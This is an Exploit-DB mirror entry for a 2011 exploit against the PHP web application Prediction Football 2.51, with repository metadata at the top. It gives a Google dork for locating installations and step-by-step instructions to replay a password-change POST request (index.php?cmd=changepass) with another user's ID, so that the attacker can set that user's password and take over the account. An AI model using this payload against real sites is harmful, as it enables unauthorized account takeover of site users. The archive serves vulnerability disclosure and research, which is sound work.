exploit-db-mirror/exploits/php/webapps/17666.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
656 B
Text

# Exploit Title: [title]
# Google Dork: [if relevant] intext:"Prediction football 2.51"
# Date: 08/08/2011
# Author: Smith Falcon
# Software Link: http://www.predictionfootball.com/download/download.html
# Version: 2.51
# Tested on: Linux
First create a username and go to Account Profile
The POST variable in index.php?cmd=changepass is vulnerable to CSRF
Grab Header Information with HTTP Live headers and replay the POST VARIABLE
&OLDPWD=anything&USERID=[id of user u want pwd
changed]&PWD1=[newpass]&PWD2=[newpass]&ChangePwd=Change+Password
REPLAY with new password of the userid and logout!
Now you can login with that desired user and password!